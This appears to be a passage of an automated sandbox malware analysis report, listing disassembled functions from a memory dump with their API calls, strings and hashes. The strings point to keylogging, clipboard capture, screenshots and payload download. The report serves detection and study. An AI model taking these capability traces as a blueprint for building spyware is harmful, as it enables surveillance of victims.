                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Window$SleepText$ForegroundLength
                                                                                        • String ID: [ $ ]
                                                                                        • API String ID: 3309952895-93608704
                                                                                        • Opcode ID: 4603c95d7a0278816d05f17b1e103e1b56ebf32c1baad14edcc254fcbbfd146b
                                                                                        • Instruction ID: 97bd403738d1ca0cb59e80c1fc79ee6201ed0cb329172f4776a94889a39aca56
                                                                                        • Opcode Fuzzy Hash: 4603c95d7a0278816d05f17b1e103e1b56ebf32c1baad14edcc254fcbbfd146b
                                                                                        • Instruction Fuzzy Hash: FE119F315043006BC614BB65CC5399F77A8AF50308F40053FF552665E2FF79AA5886DB
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0041B7FF Relevance: 6.1, APIs: 4, Instructions: 63timesleepCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: SystemTimes$Sleep__aulldiv
                                                                                        • String ID:
                                                                                        • API String ID: 188215759-0
                                                                                        • Opcode ID: 1460bbf00a7581670417fcbf42b3a1dfd5e2489cdc62901d12e8026d78940c5d
                                                                                        • Instruction ID: 72b4c32e7059473e424b83a6cc96647c38f9827b21069785d395d2d8421d6a64
                                                                                        • Opcode Fuzzy Hash: 1460bbf00a7581670417fcbf42b3a1dfd5e2489cdc62901d12e8026d78940c5d
                                                                                        • Instruction Fuzzy Hash: B0113D7A5083456BD304FAB5CC85DEB7BACEAC4654F040A3EF54A82051FE68EA4886A5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00443A33 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
                                                                                        • Instruction ID: 17f232e73e96fb976a24982deb7d35e81c220cd9520ca4ef7e8dcf180de91df6
                                                                                        • Opcode Fuzzy Hash: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
                                                                                        • Instruction Fuzzy Hash: 1301F2B36497067EFA202E786CC1F67220CDF41BBEB34032BB574712D1DA68CE404568
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00443AB2 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
                                                                                        • Instruction ID: 34d970f17befced98e3ca294e9c9a609e5e7bfbb0444a55afbb34e25ce639c56
                                                                                        • Opcode Fuzzy Hash: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
                                                                                        • Instruction Fuzzy Hash: 0601A2B26096117EFA111E796CC4E27624CDB81BBF325032BF535612D6DA688E014169
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00448566 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,0044850D,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue), ref: 00448598
                                                                                        • GetLastError.KERNEL32(?,0044850D,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7), ref: 004485A4
                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044850D,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000), ref: 004485B2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad$ErrorLast
                                                                                        • String ID:
                                                                                        • API String ID: 3177248105-0
                                                                                        • Opcode ID: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                                                                                        • Instruction ID: d5df962f837ff7629ef00c7a8b4dcab40ba3e58d8e4ddb8b40c265455ff02ab4
                                                                                        • Opcode Fuzzy Hash: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                                                                                        • Instruction Fuzzy Hash: AA012832602322FBD7214B289C4495B7798AB50B61B20053AFD05D3241DF34CD01CAE8
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0041C485 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                                                                                        • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C4B2
                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C4D7
                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,0040412F,00465E74), ref: 0041C4E5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$CloseCreateHandleReadSize
                                                                                        • String ID:
                                                                                        • API String ID: 3919263394-0
                                                                                        • Opcode ID: c4d28c244904a0c4b31f6914b30dbe9704a3e03414ae878e480ac2c22075bc56
                                                                                        • Instruction ID: d938e931a51b81dfe9e25773ede9364464a286a3a3b97e7b856b7b87d8bf29b3
                                                                                        • Opcode Fuzzy Hash: c4d28c244904a0c4b31f6914b30dbe9704a3e03414ae878e480ac2c22075bc56
                                                                                        • Instruction Fuzzy Hash: 0FF0C2B1245308BFE6101B25ACD4EBB375CEB867A9F00053EF902A22C1CA298C05913A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00439863 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ___BuildCatchObject.LIBVCRUNTIME ref: 0043987A
                                                                                          • Part of subcall function 00439EB2: ___AdjustPointer.LIBCMT ref: 00439EFC
                                                                                        • _UnwindNestedFrames.LIBCMT ref: 00439891
                                                                                        • ___FrameUnwindToState.LIBVCRUNTIME ref: 004398A3
                                                                                        • CallCatchBlock.LIBVCRUNTIME ref: 004398C7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                        • String ID:
                                                                                        • API String ID: 2633735394-0
                                                                                        • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                                        • Instruction ID: dcee73c62e3621a690853eebe59cad03ae51e1002f288686f44977c5109bb855
                                                                                        • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                                        • Instruction Fuzzy Hash: 18011732000109BBCF12AF55CC01EDA3BBAEF9D754F04511AFD5861221C3BAE861DBA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004193E3 Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetSystemMetrics.USER32(0000004C), ref: 004193F0
                                                                                        • GetSystemMetrics.USER32(0000004D), ref: 004193F6
                                                                                        • GetSystemMetrics.USER32(0000004E), ref: 004193FC
                                                                                        • GetSystemMetrics.USER32(0000004F), ref: 00419402
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: MetricsSystem
                                                                                        • String ID:
                                                                                        • API String ID: 4116985748-0
                                                                                        • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                                                        • Instruction ID: 9a44d86f369c7068fc2c949f9b02ed5542bf43da40f6b7222f807aea32733f55
                                                                                        • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                                                        • Instruction Fuzzy Hash: DFF0A471B043155BD744EA759C51A6F6BD5EBD4264F10043FF20887281EE78DC468785
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00438F31 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438F31
                                                                                        • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438F36
                                                                                        • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438F3B
                                                                                          • Part of subcall function 0043A43A: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A44B
                                                                                        • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438F50
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                        • String ID:
                                                                                        • API String ID: 1761009282-0
                                                                                        • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                                        • Instruction ID: 04dbcd9d80b8837b95b31ffc0e846904d80335f120ca5f78e3accc67d081205e
                                                                                        • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                                        • Instruction Fuzzy Hash: 59C04C15080781541C50B6B2210B2AE83461E7E38DFD074DFFCE0571038E4E043B653F
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00449E3C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • WideCharToMultiByte.KERNEL32(000000FF,00000000,00000006,00000001,?,?,00000000,?,00000000,?,?,00000000,00000006,?,?,?), ref: 00449F0F
                                                                                        • GetLastError.KERNEL32 ref: 00449F2B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ByteCharErrorLastMultiWide
                                                                                        • String ID: PkGNG
                                                                                        • API String ID: 203985260-263838557
                                                                                        • Opcode ID: 8762d6c9eb8cd6bb849928aa97b0b7335ecf1b8cbe6ccd937ce160abea437523
                                                                                        • Instruction ID: 5218313022fb824330162c1b3e1e252a07855a0508c927524b2412b0d5c8e50b
                                                                                        • Opcode Fuzzy Hash: 8762d6c9eb8cd6bb849928aa97b0b7335ecf1b8cbe6ccd937ce160abea437523
                                                                                        • Instruction Fuzzy Hash: A531F831600205EBEB21EF56C845BAB77A8DF55711F24416BF9048B3D1DB38CD41E7A9
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00418A92 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00418ABE
                                                                                          • Part of subcall function 00418656: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418AD1,00000000,?,?,?,?,00000000), ref: 0041866A
                                                                                        • SHCreateMemStream.SHLWAPI(00000000), ref: 00418B0B
                                                                                          • Part of subcall function 004186CB: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B27,00000000,?,?), ref: 004186DD
                                                                                          • Part of subcall function 00418679: GdipDisposeImage.GDIPLUS(?,00418B82), ref: 00418682
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                                        • String ID: image/jpeg
                                                                                        • API String ID: 1291196975-3785015651
                                                                                        • Opcode ID: 8883413a241ecd6daa78ef1183ec8e175d09e4f7b2134cb7e7ff04ec22b53db4
                                                                                        • Instruction ID: 71c7567624fb1f0fb67e5b365d5baafb3eed0516d04e2b9615b8e3d4f66a2876
                                                                                        • Opcode Fuzzy Hash: 8883413a241ecd6daa78ef1183ec8e175d09e4f7b2134cb7e7ff04ec22b53db4
                                                                                        • Instruction Fuzzy Hash: 13317F71504300AFC301EF65CC84DAFB7E9FF8A704F00496EF985A7251DB7999448BA6
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040B748 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                                                                        • __Init_thread_footer.LIBCMT ref: 0040B797
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Init_thread_footer__onexit
                                                                                        • String ID: [End of clipboard]$[Text copied to clipboard]
                                                                                        • API String ID: 1881088180-3686566968
                                                                                        • Opcode ID: 324d16734c00dd0800ed2bf7710d2d62d1c0e2a3751a5b5203366b445deaa986
                                                                                        • Instruction ID: c7bebb0a0a15900a9cc4ffb6e17528162536323bfdf0e6139bd55c50ddf57f74
                                                                                        • Opcode Fuzzy Hash: 324d16734c00dd0800ed2bf7710d2d62d1c0e2a3751a5b5203366b445deaa986
                                                                                        • Instruction Fuzzy Hash: C0219F32A101054ACB14FB66D8829EDB379AF90318F10453FE505731E2EF386D4A8A9C
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00451B37 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451D92,?,00000050,?,?,?,?,?), ref: 00451C12
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ACP$OCP
                                                                                        • API String ID: 0-711371036
                                                                                        • Opcode ID: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
                                                                                        • Instruction ID: fc24b39bc158c677debbea649066bee6e1bba6d32f28379ebc1c8ba741b2d3ba
                                                                                        • Opcode Fuzzy Hash: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
                                                                                        • Instruction Fuzzy Hash: BA217D22A4010063DB34CF54C940B9B326ADF50B27F568166ED09C7322F73AED44C39C
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0044B731 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81fileCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • WriteFile.KERNEL32(?,?,?,?,00000000,FF8BC35D,00000000,?,PkGNG,0044BB6E,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B7DB
                                                                                        • GetLastError.KERNEL32 ref: 0044B804
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorFileLastWrite
                                                                                        • String ID: PkGNG
                                                                                        • API String ID: 442123175-263838557
                                                                                        • Opcode ID: e2af8d231f6539d56f2593d6ace3ed0d4bab48f660b2d85d051dab4aa689f9d2
                                                                                        • Instruction ID: 56933c973e2243a1a9a6e47b5ff38ff3048756f5123006952a384074424e161b
                                                                                        • Opcode Fuzzy Hash: e2af8d231f6539d56f2593d6ace3ed0d4bab48f660b2d85d051dab4aa689f9d2
                                                                                        • Instruction Fuzzy Hash: 12319331A00619DBCB24CF59CD809DAB3F9EF88311F1445AAE509D7361D734ED81CB68
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0044B652 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77fileCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • WriteFile.KERNEL32(?,?,?,?,00000000,FF8BC35D,00000000,?,PkGNG,0044BB8E,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B6ED
                                                                                        • GetLastError.KERNEL32 ref: 0044B716
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorFileLastWrite
                                                                                        • String ID: PkGNG
                                                                                        • API String ID: 442123175-263838557
                                                                                        • Opcode ID: 51546446b41bf805027a94335c0e64e4fe702750584376849c5da3291fd64da6
                                                                                        • Instruction ID: 12ef57d8ab414bd2a6c5914f5c8b73f84ca543b1ee1fc2f1adbb6bb6aefc8993
                                                                                        • Opcode Fuzzy Hash: 51546446b41bf805027a94335c0e64e4fe702750584376849c5da3291fd64da6
                                                                                        • Instruction Fuzzy Hash: 6C21B435600219DFCB14CF69C980BE9B3F8EB48302F1044AAE94AD7351D734ED81CB64
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00418B8F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00418BAA
                                                                                          • Part of subcall function 00418656: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418AD1,00000000,?,?,?,?,00000000), ref: 0041866A
                                                                                        • SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,?,?,?,?,00000000), ref: 00418BCF
                                                                                          • Part of subcall function 004186CB: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B27,00000000,?,?), ref: 004186DD
                                                                                          • Part of subcall function 00418679: GdipDisposeImage.GDIPLUS(?,00418B82), ref: 00418682
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                                        • String ID: image/png
                                                                                        • API String ID: 1291196975-2966254431
                                                                                        • Opcode ID: 6411a8012ecf1a64a1773f4eaa23e3f4fcdf1f742ac8238d8550c3e8c78666f9
                                                                                        • Instruction ID: c6f894421d6f6d4ca6915e56eba1d7ff3797fde04a376feef2065c2e579c4a83
                                                                                        • Opcode Fuzzy Hash: 6411a8012ecf1a64a1773f4eaa23e3f4fcdf1f742ac8238d8550c3e8c78666f9
                                                                                        • Instruction Fuzzy Hash: 30219371204211AFC705EB61CC88CBFBBADEFCA754F10092EF54693161DB399945CBA6
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00404FF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405030
                                                                                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                                        • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405087
                                                                                        Strings
                                                                                        • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: LocalTime
                                                                                        • String ID: KeepAlive | Enabled | Timeout:
                                                                                        • API String ID: 481472006-1507639952
                                                                                        • Opcode ID: 23b0d405c7df8ea3eb93e7c73b3042e9bf9b9ce6517dcb05167bfa0c68009315
                                                                                        • Instruction ID: 59903f388a44bacb81d563bcbf5ab321eb0051b597eccb46fab67989b44e7fd4
                                                                                        • Opcode Fuzzy Hash: 23b0d405c7df8ea3eb93e7c73b3042e9bf9b9ce6517dcb05167bfa0c68009315
                                                                                        • Instruction Fuzzy Hash: 1D21F2719046405BD710B7259C0676F7B64E751308F40087EE8491B2A6DA7D5A88CBEF
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0041663B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62sleepfilenetworkCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • Sleep.KERNEL32 ref: 00416640
                                                                                        • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166A2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: DownloadFileSleep
                                                                                        • String ID: !D@
